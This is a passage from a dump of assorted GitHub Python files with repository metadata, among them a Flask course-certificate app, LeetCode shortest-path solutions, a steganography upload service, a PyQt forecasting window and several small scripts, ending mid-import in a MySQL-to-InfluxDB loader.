h=16)\n pdf.set_xy(155, y_signature+6)\n pdf.multi_cell(w=90,\n h=6.5,\n txt=\"______________________\\n\"\n \"JOÃO ALEXANDRE\\nPESCHANSKI\\n\\nPesquisador associado\\ndo CEPID NeuroMat\",\n border=0,\n align='C')\n pdf.cell(w=0, h=10, ln=1) # New line\n pdf.set_font('Merriweather', '', 10.5)\n\n # Text\n pdf.set_x(25)\n pdf.multi_cell(w=247, h=10, border=0, align='C', txt='O curso de Introdução ao Jornalismo Científico não tem um '\n 'controle de registros, as leituras e tarefas são de acesso '\n 'livre. Este certificado, portanto, não é reconhecido como '\n 'um diploma oficial. O curso totaliza para sua realização '\n 'noventa horas.')\n\n # Generate the file\n file = pdf.output(dest='S').encode('latin-1')\n\n response = make_response(file)\n response.headers.set('Content-Disposition', 'attachment',\n filename='IJC_Certificado_' + name.replace(\" \", \"_\") + '.pdf')\n response.headers.set('Content-Type', 'application/pdf')\n return response\n else:\n return redirect(url_for('certificate'))\n else:\n return redirect(url_for('home'))\n\n\n# Gerar anexos\n@app.route('/generate_attachment', methods=['GET'])\ndef generate_attachment():\n username = get_username()\n\n base_url = \"https://pt.wikiversity.org/api/rest_v1/page/pdf/\"\n prefix_course = 'Introdução_ao_Jornalismo_Científico%2F'\n pages = [\"Metodologia_e_Filosofia_da_Ciência%2FAtividade%2F\",\n \"História_da_Ciência_e_da_Tecnologia%2FAtividade%2F\",\n \"Ética_da_Ciência%2FAtividade%2F\",\n \"Temas_Centrais_da_Ciência_Contemporânea%2FAtividade%2F\",\n \"Modos_de_Organização_e_Financiamento_dos_Sistemas_de_Pesquisa,_no_Brasil_e_no_Exterior%2FAtividade%2F\",\n \"Mídias,_Linguagens_e_Prática_do_Jornalismo_Científico%2FAtividade%2F\"]\n\n user = Users.query.filter_by(username=username).first()\n\n if user and user.can_download_certificate == \";\".join([\"T\" for i in range(app.config[\"NUMBER_OF_MODULES\"])]):\n try:\n responses = []\n for page in pages:\n responses.append(PyPDF2.PdfFileReader(io.BytesIO(requests.get(base_url + prefix_course + page + user.username).content)))\n output = io.BytesIO()\n writer = PyPDF2.PdfFileWriter()\n for response in responses:\n n = response.getNumPages()\n for i in range(n):\n writer.addPage(response.getPage(i))\n\n writer.write(output)\n result = Response(output.getvalue(), mimetype=\"application/pdf\")\n result.headers.set('Content-Disposition', 'attachment',\n filename='IJC_Anexos_' + user.full_name.replace(' ', '_') + '.pdf')\n result.headers.set('Content-Type', 'application/pdf')\n return result\n except:\n return redirect(url_for('certificate'))\n else:\n return redirect(url_for('certificate'))\n\n\n# Gerenciar atividades\n@app.route('/certificate', methods=['GET'])\ndef certificate():\n username = get_username()\n\n if request.method == 'GET':\n if username in app.config['COORDINATORS_USERNAMES']:\n users = Users.query.all()\n return render_template('certificate.html',\n username=username,\n users=users,\n coordinator=True)\n else:\n users = Users.query.filter_by(username=username)\n\n if users.first():\n can_download_certificate = all(x == \"T\" for x in users.first().can_download_certificate.split(\";\"))\n else:\n return redirect(url_for('subscription'))\n return render_template('certificate.html',\n username=username,\n users=users,\n can_download_certificate=can_download_certificate)\n else:\n return redirect(url_for('home'))\n\n\n# Gerenciar atividades\n@app.route('/certificate/requested', methods=['GET'])\ndef certificate_only_requested():\n username = get_username()\n\n if username in app.config['COORDINATORS_USERNAMES']:\n if request.method == 'GET':\n users = Users.query.filter_by(solicited_certificate=True)\n return render_template('certificate.html',\n username=username,\n users=users,\n coordinator=True)\n else:\n return redirect(url_for('certificate'))\n\n\n# Solicitar certificado\n@app.route('/solicit_certificate', methods=['GET'])\ndef solicit_certificate():\n username = get_username()\n\n user_soliciting = Users.query.filter_by(username=username).first()\n if username and user_soliciting and user_soliciting.can_download_certificate != \"T;T;T;T;T;T\" and not user_soliciting.solicited_certificate:\n user_soliciting.solicited_certificate = True\n\n status_activities = \";\".join(\n [\"NP\" if x == \"F\" else x for x in user_soliciting.can_download_certificate.split(\";\")])\n user_soliciting.can_download_certificate = status_activities\n\n try:\n db.session.commit()\n ask_coordinator_for_certificate_email(user_soliciting.username, user_soliciting.full_name)\n return redirect(url_for('certificate'))\n except:\n return 'Ocorreu um erro!'\n else:\n return redirect(url_for('certificate'))\n\n\n# Rejeitar pedido de certificação (atividades pendentes)\n@app.route('/deny_solicitation/', methods=['GET'])\ndef deny_solicitation_for_certificate(user_username):\n username = get_username()\n\n if username in app.config['COORDINATORS_USERNAMES']:\n user_denied = Users.query.filter_by(username=user_username).first()\n if user_username and user_denied:\n user_denied.solicited_certificate = False\n try:\n db.session.commit()\n return redirect(url_for('certificate'))\n except:\n return 'Ocorreu um erro!'\n else:\n return redirect(url_for('certificate'))\n\n\n# Aprovar certificação sem pedido\n@app.route('/approve_certification_without_request/', methods=['GET'])\ndef approve_certification_without_request(user_username):\n username = get_username()\n\n if username in app.config['COORDINATORS_USERNAMES']:\n user_approved = Users.query.filter_by(username=user_username).first()\n if user_username and user_approved:\n user_approved.solicited_certificate = True\n user_approved.can_download_certificate = \";\".join([\"T\" for i in range(app.config[\"NUMBER_OF_MODULES\"])])\n try:\n db.session.commit()\n return redirect(url_for('certificate'))\n except:\n return 'Ocorreu um erro!'\n else:\n return redirect(url_for('certificate'))\n\n\n# Aprovar uma atividade\n@app.route('/approve_certification//', methods=['GET'])\ndef approve_certification(user, module_activity):\n username = get_username()\n\n if username in app.config['COORDINATORS_USERNAMES'] and int(module_activity) >= 1:\n user_to_be_approved = Users.query.filter_by(username=user).first()\n\n user_modules_activities = user_to_be_approved.can_download_certificate.split(\";\")\n user_modules_activities[int(module_activity)-1] = \"T\"\n user_to_be_approved.can_download_certificate = \";\".join(user_modules_activities)\n try:\n db.session.commit()\n return redirect(url_for('certificate'))\n except:\n return 'Ocorreu um erro!'\n else:\n return redirect(url_for('certificate'))\n\n\n# Rejeitar uma atividade\n@app.route('/deny_certification//', methods=['GET'])\ndef deny_certification(user, module_activity):\n username = get_username()\n\n if username in app.config['COORDINATORS_USERNAMES']:\n user_to_be_approved = Users.query.filter_by(username=user).first()\n\n user_modules_activities = user_to_be_approved.can_download_certificate.split(\";\")\n user_modules_activities[int(module_activity)-1] = \"F\"\n user_to_be_approved.can_download_certificate = \";\".join(user_modules_activities)\n try:\n db.session.commit()\n return redirect(url_for('certificate'))\n except:\n return 'Ocorreu um erro!'\n else:\n return redirect(url_for('certificate'))\n\n\ndef get_revision_ids(data):\n return_list = {}\n for elem in data['query']['pages']:\n title = data['query']['pages'][elem]['title']\n if 'revisions' in data['query']['pages'][elem]:\n revid = str(data['query']['pages'][elem]['revisions'][0]['revid'])\n link = 'https://pt.wikiversity.org/w/index.php?title='+title+'&oldid='+revid\n return_list[title] = link, True\n else:\n return_list[title] = 'https://pt.wikiversity.org/w/index.php?title='+title+'&action=edit&redlink=1', False\n return return_list\n\n\ndef get_content(data):\n return_list = {}\n for elem in data['query']['pages']:\n title = data['query']['pages'][elem]['title']\n if 'revisions' in data['query']['pages'][elem]:\n content = str(data['query']['pages'][elem]['revisions'][0]['*'])\n return_list[title] = content\n else:\n return_list[title] = ''\n return return_list\n\n\n# Enviar email\ndef ask_coordinator_for_certificate_email(username, fullname):\n email_sender = app.config[\"GMAIL_EMAIL\"]\n email_password = app.config[\"GMAIL_PASSWORD\"]\n email_receiver = app.config[\"GMAIL_COORDINATOR_EMAIL\"]\n\n subject = \"{fullname} ({username}) está solicitando um certificado do curso de Introdução ao Jornalismo Científico\"\n body = \"\"\"Olá, {coordinator},

O(A) estudante {fullname}, cujo nome de usuário é {username} está solicitando que suas atividades do curso Introdução ao Jornalismo Científico sejam avaliadas e lhe seja garantido o certificado de conclusão do curso.

Você pode verificar este(a) e outros(as) estudantes com avaliações pendentes em {url}.

Introdução ao Jornalismo Científico
Solicitações de certificados | ijc.toolforge.org\"\"\"\n\n em = EmailMessage()\n em[\"From\"] = formataddr((str(Header(app.config[\"GMAIL_EMAIL_HEADER\"], 'utf-8')), email_sender))\n em[\"To\"] = \", \".join(email_receiver)\n em[\"Subject\"] = subject.format(fullname=fullname, username=username)\n formatted_body = body.format(fullname=fullname,\n username=username,\n url=url_for(\"certificate_only_requested\", _external=True),\n url_home=url_for(\"home\", _external=True),\n coordinator=\" e \".join([\", \".join(app.config[\"COORDINATORS_USERNAMES\"][:-1]), app.config[\"COORDINATORS_USERNAMES\"][-1]]))\n em.set_content(MIMEText(formatted_body, \"html\"))\n\n context = ssl.create_default_context()\n with smtplib.SMTP_SSL('smtp.gmail.com', 465, context=context) as smtp:\n smtp.login(email_sender, email_password)\n smtp.sendmail(email_sender, email_receiver, em.as_string())\n\n\nif __name__ == '__main__':\n app.run()\n\n","repo_name":"WikiMovimentoBrasil/ijc","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":36245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6057757038","text":"# my BFS solution. unexplicably won't pass, but passes on vscode and pythontutor...\nimport collections\nclass Solution:\n def networkDelayTime(self, times, n, k) -> int:\n seenTimes = {}\n edges = collections.defaultdict(list)\n \n for edge in times:\n edges[edge[0]].append((edge[1], edge[2]))\n \n q = collections.deque([[k, 0]])\n seenTimes[k] = 0\n while q:\n location, time = q.popleft()\n seenTimes[location] = min(seenTimes.get(location, float('inf')), time)\n while edges[location]:\n edge = edges[location].pop()\n q.append([edge[0], edge[1] + time])\n \n minTime = 0\n for location in seenTimes:\n minTime = max(minTime, seenTimes[location])\n \n return minTime if len(seenTimes) == n else -1\n \ntimes = [[2,1,47],[3,5,46],[4,1,6],[5,4,7],[4,5,19],[3,2,18],[1,2,0],[5,1,25],[2,5,58]]\ntest = Solution()\nprint(test.networkDelayTime(times, 5, 3))\n\n# SPFA\nclass Solution:\n def networkDelayTime(self, times: List[List[int]], n: int, k: int) -> int:\n seenTimes = [float('inf') for _ in range(n)]\n seenTimes[k-1] = 0\n weight = collections.defaultdict(dict)\n for frm, to, time in times:\n weight[frm][to] = time\n q = collections.deque([k])\n while q:\n frm = q.popleft()\n for to in weight[frm]:\n if seenTimes[frm-1] + weight[frm][to] < seenTimes[to-1]:\n seenTimes[to-1] = seenTimes[frm-1] + weight[frm][to]\n q.append(to)\n return max(seenTimes) if max(seenTimes) < float('inf') else -1\n\n# Bellman-Ford algo - pretty fast after adding the flag. also uses minimal space compared to others\nclass Solution:\n def networkDelayTime(self, times: List[List[int]], n: int, k: int) -> int:\n seenTimes = [float('inf') for _ in range(n)]\n seenTimes[k-1] = 0\n for _ in range(n):\n flag = 1\n for frm, to, time in times:\n if seenTimes[frm-1] + time < seenTimes[to-1]:\n seenTimes[to-1] = seenTimes[frm-1] + time\n flag = 0\n if flag:\n break\n return max(seenTimes) if max(seenTimes) < float('inf') else -1\n\n# dijkstra's - efficient version\nclass Solution:\n def networkDelayTime(self, times: List[List[int]], n: int, k: int) -> int:\n graph = defaultdict(list)\n for src, dst, c in times:\n graph[src].append((dst, c)) \n \n \n queue = [(0, k)] #(cost, node)\n visited = set()\n max_cost = 0\n \n while queue:\n \n #Always pop the min value\n cost, node = heapq.heappop(queue)\n \n if node in visited:\n continue\n \n visited.add(node)\n \n max_cost = max(max_cost, cost)\n\n neighbours = graph[node]\n \n for neighbour in neighbours:\n \n new_node, new_cost = neighbour\n \n if new_node not in visited:\n \n curr_cost = cost + new_cost\n \n heapq.heappush(queue, (curr_cost, new_node))\n \n\n return max_cost if len(visited) == n else -1","repo_name":"farrellas/leetcode_solutions","sub_path":"network_delay_time.py","file_name":"network_delay_time.py","file_ext":"py","file_size_in_byte":3399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25710926629","text":"# Author: James Anderson\n# EAI Coding Challenge: Address Book\n\n#A container for contact information\nclass Contact:\n def __init__(self, name, address='', phone_number='', email_address=''):\n self.name = name\n self.address = address\n self.email_address = email_address\n self.phone_number = phone_number\n","repo_name":"snaco/AddressBookEAI","sub_path":"Contact.py","file_name":"Contact.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"3650841694","text":"import numpy\r\nfrom PyQt5 import QtWidgets\r\nfrom PyQt5.QtWidgets import QTableWidgetItem, QRadioButton, QButtonGroup\r\n\r\nimport pyqtgraph as pg\r\nfrom ui import prognosticwin\r\nfrom win import Win\r\nfrom localBD.bdcontroller import BdController\r\nfrom dataprepare import DataPreparator\r\nfrom PyQt5 import QtCore\r\n\r\n\r\nclass BasePrognose(Win, prognosticwin.Ui_Prognosis):\r\n def __init__(self, mainwindow):\r\n super().__init__(mainwindow=mainwindow)\r\n self.db = BdController()\r\n self.preparator = DataPreparator()\r\n\r\n self.listOptions = []\r\n self.listApps = []\r\n\r\n apps, options = self.preparator.forPrognosticWindow(self.db.read_market(), self.db.read_options())\r\n\r\n self.tableApps.setColumnCount(1)\r\n self.tableApps.setRowCount(len(apps))\r\n self.tableApps.setHorizontalHeaderLabels(['Applications'])\r\n self.tableApps.setColumnWidth(0, 250)\r\n for i in range(len(apps)):\r\n for j in range(1):\r\n chkBoxItem = QTableWidgetItem()\r\n chkBoxItem.setFlags(QtCore.Qt.ItemIsUserCheckable | QtCore.Qt.ItemIsEnabled)\r\n chkBoxItem.setCheckState(QtCore.Qt.Unchecked)\r\n chkBoxItem.setText(apps[i])\r\n self.tableApps.setItem(i, j, chkBoxItem)\r\n self.tableApps.itemClicked.connect(self.handleItemClickedApps)\r\n\r\n self.tableOptions.setColumnCount(1)\r\n self.tableOptions.setRowCount(len(options))\r\n self.tableOptions.setHorizontalHeaderLabels(['Options'])\r\n self.tableOptions.setColumnWidth(0, 250)\r\n for i in range(len(options)):\r\n for j in range(1):\r\n chkBoxItem = QTableWidgetItem()\r\n chkBoxItem.setFlags(QtCore.Qt.ItemIsUserCheckable | QtCore.Qt.ItemIsEnabled)\r\n chkBoxItem.setCheckState(QtCore.Qt.Unchecked)\r\n chkBoxItem.setText(options[i])\r\n self.tableOptions.setItem(i, j, chkBoxItem)\r\n self.tableOptions.itemClicked.connect(self.handleItemClickedOptions)\r\n\r\n self.prognoseButton.clicked.connect(self.make_prognose)\r\n\r\n def make_prognose(self):\r\n timesteps = 7\r\n data = self.db.read_market()\r\n\r\n for app in self.listApps:\r\n mainset = []\r\n for opt in self.listOptions:\r\n set = self.preparator.prepare_prognose(data, app, opt, timesteps)\r\n set = numpy.array(set)\r\n set = set.reshape(1, timesteps, 1)\r\n y = []\r\n x = []\r\n\r\n model = self.db.read_model(opt)\r\n for i in range(100):\r\n set = model.predict(set)\r\n x.append(i)\r\n y.append(set[0][len(set)-1][0])\r\n mainset.append(y)\r\n\r\n pg.setConfigOption('background', 'w')\r\n pg.setConfigOption('foreground', 'k')\r\n pw = pg.plot(x, y, pen='g')\r\n\r\n model = self.db.read_model('main')\r\n ms = []\r\n for i in range(len(mainset[0])):\r\n mms = []\r\n for j in range(len(mainset)):\r\n mms.append(mainset[j][i])\r\n ms.append(mms)\r\n s1 = len(ms)\r\n s2 = len(ms[0])\r\n ms = numpy.array(ms)\r\n ms = ms.reshape(s1, s2)\r\n y = model.predict(ms)\r\n yp = []\r\n for y1 in y:\r\n yp.append(self.preparator.transform_y_dense(y1))\r\n x = range(0, len(yp))\r\n pg.setConfigOption('background', 'w')\r\n pg.setConfigOption('foreground', 'k')\r\n pw = pg.plot(x, yp, pen='g')\r\n print(yp[0])\r\n\r\n\r\n\r\n\r\n def handleItemClickedOptions(self, item):\r\n if item.checkState() == QtCore.Qt.Checked:\r\n self.listOptions.append(item.text())\r\n else:\r\n try:\r\n self.listOptions.remove(item.text())\r\n except:\r\n pass\r\n\r\n def handleItemClickedApps(self, item):\r\n if item.checkState() == QtCore.Qt.Checked:\r\n self.listApps.append(item.text())\r\n else:\r\n try:\r\n self.listApps.remove(item.text())\r\n except:\r\n pass","repo_name":"BurlakaR/diploma","sub_path":"prognosticcontroller.py","file_name":"prognosticcontroller.py","file_ext":"py","file_size_in_byte":4241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"21194343814","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Aug 16 15:41:47 2019\n\n@author: dchhitarka\n\nImport Bahubali2vsDangal.csv file.\n\nIt contains Data of Day wise collections of the movies Bahubali 2 and Dangal (in crores) for the first 9 days. \nNow, you have to write a python code to predict which movie would collect more on the 10th day.\n\"\"\"\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\ndf = pd.read_csv('Bahubali2_vs_Dangal.csv')\ndf.isnull().any(axis=0)\ndf.columns\n#x = df['Days']\n#yb = df['Bahubali_2_Collections_Per_day']\n#yd = df['Dangal_collections_Per_day']\ndays = df[['Days']]\nbahu = df.iloc[:,1]\ndang = df.iloc[:,2]\n\n\nfrom sklearn.linear_model import LinearRegression\n\nlb = LinearRegression()\nlb.fit(days, bahu)\n\nldang = LinearRegression()\nldang.fit(days, dang)\n\nldang.predict(np.array(10).reshape(-1,1))\n\nlb.predict(np.array(10).reshape(-1,1))\n","repo_name":"dchhitarka/machinelearning","sub_path":"Inhouse Internship/baha2_vs_dangal.py","file_name":"baha2_vs_dangal.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26533289042","text":"from setuptools import setup\n\nVERSION = '0.0.1'\nDESCRIPTION = 'Simple python module'\nLONG_DESCRIPTION = 'A package that prints hello world'\n\n# Setting up\nsetup(\n name=\"greetmsg\",\n version=VERSION,\n author=\"Ankush Bhawar\",\n author_email=\"\",\n description=DESCRIPTION,\n long_description_content_type=\"text/markdown\",\n long_description=LONG_DESCRIPTION,\n keywords=['python', 'video', 'stream', 'video stream', 'camera stream', 'sockets'],\n classifiers=[\n \"Development Status :: 1 - Planning\",\n \"Intended Audience :: Developers\",\n \"Programming Language :: Python :: 3\",\n \"Operating System :: Unix\",\n \"Operating System :: MacOS :: MacOS X\",\n \"Operating System :: Microsoft :: Windows\",\n ]\n)","repo_name":"ankush-bhawar07/greetmsg","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"21606309424","text":"# Python Program to print Prime Numbers from 1 to 100\n\nfor i in range(1, 101):\n count = 0\n for j in range(2, (i // 2 + 1)):\n if i % j == 0:\n count = count + 1\n break\n\n if count == 0 and i != 1:\n print(\" %d\" % i, end=' ')\n","repo_name":"pujac0608/AutomationPython","sub_path":"PracticePythonCode/primeNumbers.py","file_name":"primeNumbers.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38791767077","text":"from typing import Dict, Optional\nimport pathlib\nimport re\n\nimport yaml\n\nARTIFACTS_DIR = pathlib.Path(__file__).parent.absolute() / \"artifacts\"\n\n\ndef read_us_state_clean_mapping() -> Dict:\n\n with open(ARTIFACTS_DIR / \"us_state_codes.yaml\", \"r\") as f:\n us_state_codes = yaml.safe_load(f)\n\n us_state_codes_prefixed = {f\"US-{k}\": v for k, v in us_state_codes.items()}\n\n us_state_upper = {v.upper(): v for _, v in us_state_codes.items()}\n\n with open(ARTIFACTS_DIR / \"us_state_misspellings.yaml\", \"r\") as f:\n us_state_misspellings = yaml.safe_load(f)\n\n us_state_clean_mapping = dict(\n list(us_state_codes.items())\n + list(us_state_codes_prefixed.items())\n + list(us_state_upper.items())\n + list(us_state_misspellings.items())\n )\n\n return us_state_clean_mapping\n\n\nUS_STATE_CLEAN_MAPPING = read_us_state_clean_mapping()\n\n\ndef standardise_state(raw_us_state: Optional[str]) -> Optional[str]:\n \"\"\"\n This method standardises the US state string and corrects misspellings.\n Ideally, however this process should sit in the application layer than here (users shouldn't\n be allowed to enter e.g. Los Angeles in the state field).\n \"\"\"\n\n if raw_us_state == None:\n return None\n\n us_state = re.sub(\"\\s+\", \" \", raw_us_state).strip().replace(\".\", \"\").upper()\n\n return US_STATE_CLEAN_MAPPING.get(us_state)\n","repo_name":"antyan001/blockchain-mle-task","sub_path":"blockchain_task/preprocessing/address.py","file_name":"address.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"1108200075","text":"import sys\nsys.stdin = open('input.txt')\n\ndx = [-1, 1, 0, 0]\ndy = [0, 0, -1, 1]\n\ndef check(nx, ny):\n if 0 <= nx < N and 0 <= ny < N:\n return True\n else:\n return False\n\ndef DFS(x, y, cnt, num):\n stack = []\n stack.append((x, y, cnt, num))\n\n while stack:\n x, y, cnt, num = stack.pop()\n for i in range(4):\n nx = x + dx[i]\n ny = y + dy[i]\n\n # 벽체크, 다음 위치가 내 위치보다 1클때만\n # 다음 위치가 내 위치보다 1 클때만 이동할 것이므로\n # 별도의 방문처리 필요 없음\n if check(nx, ny) and arr[nx][ny] == arr[x][y]+1:\n # 현재까지의 각 방들의 합을 num에 할당\n num += arr[nx][ny]\n # 다음 위치 조사\n stack.append((nx, ny, cnt+1, num))\n return cnt, num\n\n\n\nT = int(input())\n\nfor tc in range(1, T+1):\n N = int(input())\n arr = [list(map(int, input().split())) for _ in range(N)]\n # 최종 결과 초기화\n # 출발 위치, 방문한 방의 개수, 각 방들의 숫자 합\n result = [0, 0, 0]\n\n # 전체 위치에서 조회\n for x in range(N):\n for y in range(N):\n cnt, num = DFS(x, y, 1, arr[x][y])\n # 방문한 방의 개수가 더 많다면\n if result[1] < cnt:\n # 최종 결과 변경\n result = [arr[x][y], cnt, num]\n # 방문한 개수가 같고, 각 방의 합이 현재 값보다 작을때만\n elif result[1] == cnt and result[2] > num:\n # 변경\n result = [arr[x][y], cnt, num]\n\n print(f'#{tc} {result[0]} {result[1]}')","repo_name":"RoraKim/Homework","sub_path":"3_algorithm_hws/0318/1861_정사각형_방/1861_정사각형_방.py","file_name":"1861_정사각형_방.py","file_ext":"py","file_size_in_byte":1697,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"16425549571","text":"\"\"\"web URL Configuration\r\n\r\nThe `urlpatterns` list routes URLs to views. For more information please see:\r\n https://docs.djangoproject.com/en/2.1/topics/http/urls/\r\nExamples:\r\nFunction views\r\n 1. Add an import: from my_app import views\r\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\r\nClass-based views\r\n 1. Add an import: from other_app.views import Home\r\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\r\nIncluding another URLconf\r\n 1. Import the include() function: from django.urls import include, path\r\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\r\n\"\"\"\r\nfrom django.contrib import admin\r\nfrom django.urls import path\r\nfrom django.conf.urls import url, include\r\nfrom django.contrib import admin\r\nfrom myapp import views\r\nfrom myapp.views import ActiveUserView, ResetView\r\nfrom django.conf import settings\r\nfrom django.conf.urls.static import static\r\n\r\nurlpatterns = [\r\n url(r'^admin/', admin.site.urls),\r\n url(r'^user/',include('myapp.urls')),\r\n url(r'^$', views.index, name='home'),\r\n url(r'^ann/$', views.post_list, name='post_list'),\r\n url(r'^ann/(?P\\d{4})/(?P\\d{2})/(?P\\d{2})/(?P[-\\w]+)/$',\r\n views.post_detail,\r\n name='post_detail'),\r\n url(r'^main_doc/', views.main_doc),\r\n url(r'^bad_doc/', views.bad_doc),\r\n url(r'^pre/', views.pre),\r\n url(r'^reg_status/', views.reg_status),\r\n url(r'^view_teams/', views.view_teams),\r\n url(r'^bad/', views.bad),\r\n url(r'^q_a/', views.q_a),\r\n\turl(r'^traffic/', views.traffic),\r\n url(r'^stay/', views.stay),\r\n\turl(r'^food/', views.food),\r\n url(r'^insurance/', views.insurance),\r\n\turl(r'^donate/', views.donate),\r\n path(r'active//',ActiveUserView.as_view()), # 提取出active后的所有字符赋给active_code\r\n path(r'reset//',ResetView.as_view(),name='reset'),\r\n\r\n]+ static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\r\n\r\nif settings.DEBUG:\r\n urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_URL)\r\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_URL)\r\n","repo_name":"POABOB/Django--","sub_path":"web/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"20364325664","text":"from . import Place\n\n\nclass Water(Place):\n \"\"\"Water is a place that can only hold watersafe fighters.\"\"\"\n\n def add_fighter(self, fighter):\n \"\"\"Adding a Fighter to this place. If the fighter is not watersafe,\n its armor gonna be reduced to 0.\"\"\"\n super().add_fighter(fighter)\n if not fighter.is_watersafe:\n fighter.reduce_armor(fighter.armor)\n","repo_name":"TanX-357/Dragons-vs-Terminators","sub_path":"places/water.py","file_name":"water.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"45800532492","text":"import numpy as np\n\nimport src.mult as mult\n\n\ndef test_mult_scalar():\n x = np.array(5)\n y = np.array(8)\n out = x * y\n assert mult.mult_scalar(x, y) == out\n\n\ndef test_mult_mat():\n x = np.array([[1, 2], [3, 4]])\n y = np.array([[5, 6], [7, 8]])\n out = x @ y\n assert (mult.mult_mat(x, y) == out).all()\n","repo_name":"ucsdwcsng/pyProjExample","sub_path":"tests/mult_test.py","file_name":"mult_test.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25298014229","text":"from PIL import Image\nimport os\n\n\nrutaActual = os.path.dirname(os.path.abspath(__file__))\n\nfor nombre in os.listdir(rutaActual):\n name, extension = os.path.splitext(rutaActual + nombre)\n if extension in ['.png', '.jpg', '.jpeg']:\n foto = Image.open(rutaActual + '\\\\' + nombre)\n foto = foto.convert('RGB')\n foto.save(rutaActual+'/compresor' + \"compressed_\" + nombre, optimize=True, quality=60)\n print(rutaActual)\n print('Proceso realizado!')","repo_name":"josevillah/Clases_python","sub_path":"compresor/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"40727316318","text":"from flask import Flask, request, jsonify, send_file\nfrom flask_cors import CORS\nimport os\nimport stepic\nfrom PIL import Image\n\napp = Flask(__name__)\nCORS(app)\n\nUPLOAD_FOLDER = 'uploads'\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\nos.makedirs(UPLOAD_FOLDER, exist_ok=True)\n\n@app.route(\"/\")\ndef homePage():\n return jsonify({\"massage\": \"hello world!\"})\n\n@app.route(\"/upload\", methods=[\"POST\"])\ndef upload_file():\n if \"file\" not in request.files:\n return jsonify({\"error\": \"file not upload\"})\n\n file = request.files[\"file\"]\n\n if file.filename == \"\":\n return jsonify({\"error\": \"file is not selected\"})\n\n if file:\n try:\n img = Image.open(file)\n decode = stepic.decode(img)\n decode_data = str(decode)\n\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], \"output.png\"))\n\n return jsonify({\n \"message\": \"This image is already convert in stago...\",\n \"textData\": decode_data,\n \"downloadLink\": \"download_image\",\n \"class\": \"green\"\n })\n except:\n return jsonify({\n \"message\": \"This file is not encoded so pleas first create stago image...\",\n \"textData\": \"\",\n \"downloadLink\": 'error',\n \"class\": \"red\"\n })\n\n\n@app.route(\"/create\", methods=[\"POST\"])\ndef create_file():\n if \"file\" not in request.files:\n return jsonify({\"error\": \"file not upload\"})\n\n file = request.files[\"file\"]\n text = request.form.get(\"textData\")\n\n if file.filename == \"\":\n return jsonify({\"error\": \"file is not selected\"})\n\n if file:\n try:\n img = Image.open(file)\n img_stegano = stepic.encode(img, text.encode())\n\n img_decode = stepic.decode(img_stegano)\n image_decode_data = str(img_decode)\n\n img_stegano.save(os.path.join(\n app.config['UPLOAD_FOLDER'], \"output.png\"))\n\n return jsonify({\n \"message\": \"create image successfully...\",\n \"textData\": image_decode_data,\n \"downloadLink\": \"download_image\",\n \"class\": \"green\"\n })\n except:\n return jsonify({\n \"message\": \"This file is not encoded so pleas first create stago image...\",\n \"textData\": \"\",\n \"downloadLink\": 'error',\n \"class\": \"red\"\n })\n\n\n@app.route(\"/download_image\")\ndef download_image():\n img_path = os.path.join(app.config['UPLOAD_FOLDER'], \"output.png\")\n return send_file(img_path, as_attachment=True)\n\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"herinpatel15/server","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"74535088730","text":"#!/usr/bin/python\n# -*- coding:utf8 -*-\n\n\"\"\"\nAuthor: Yuanzhaolin\nDate: 2021年2月1日\n\n功能: 读取mysql数据录入mongodb和influxdb\n使用方法:\npython data_import.py [--debug] --mode [nfca|ustb]\n本校区内采用ustb,非矿现场设置为nfca\n\n2021.04.09 周佳城 从mongo读数据到influxdb,according to time(ATT)\n\"\"\"\n\nimport sys, os, pymysql\nimport yaml\nimport getopt\nimport time\nimport datetime\nimport pymongo\nfor _ in range(1, 4):\n sys.path.append('../' * _) # 便于直接在目录下运行该文件\nfrom nfcadb.buffer_to_nfcadb.point_cache import InstrumentPointCache\nfrom nfcadb.buffer_to_nfcadb.database_util import MysqlUtil, write2influx_db\nfrom influxdb_client import InfluxDBClient, WritePrecision\nfrom 